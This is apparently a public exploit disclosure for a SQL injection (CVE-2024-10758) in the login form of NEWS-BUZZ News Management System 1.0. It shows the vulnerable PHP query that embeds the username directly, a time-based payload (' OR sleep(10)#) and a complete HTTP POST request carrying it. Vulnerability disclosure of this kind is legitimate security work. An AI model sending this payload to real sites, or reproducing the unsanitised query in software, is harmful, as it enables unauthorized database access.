# Exploit Title: NEWS-BUZZ News Management System 1.0 - SQL Injection
# Google Dork: N/A
# Exploit Author: egsec
# Date: 2024-11-03
# Vendor Homepage: https://code-projects.org
# Software Link: https://code-projects.org/content-management-system-in-php-with-source-code-2/
# Version: 1.0
# Tested on: Windows 11 Pro
# Impact:  The manipulation of the argument user_name with an unknown input leads to a sql injection vulnerability
# CVE : CVE-2024-10758

## Vulnerability Description:

There is a SQL injection vulnerability in the login part of the index.php file. It allows an attacker to manipulate the SQL query and potentially perform unauthorized actions on the database.

## Vulnerable code section:

In the source code, you can find vulnerable code in the NEWS-BUZZ/login.php file:

<?php
...
$query = "SELECT * FROM users WHERE username = '$username'";
$result = mysqli_query($conn, $query) or die(mysqli_error($conn));
...
?>

In this line, the $username variable is directly embedded into the SQL query without proper handling. This allows an attacker to inject malicious SQL code.

## Proof of Concept (PoC):

1.Location: http://localhost/NEWS-BUZZ/index.php

2.Time-Based SQL Injection Payload: ' OR sleep(10)#


3.PoC request:

POST /NEWS-BUZZ/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 69
Origin: http://localhost
Connection: close
Referer: http://localhost/NEWS-BUZZ/index.php
Cookie: PHPSESSID=456n0gcbd6d09ecem39lrh3nu9
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i

user_name=admin%27+or+sleep%2810%29%23&user_password=adminpass&login=

4.PoC response:

The response will come called time by using sleep() function.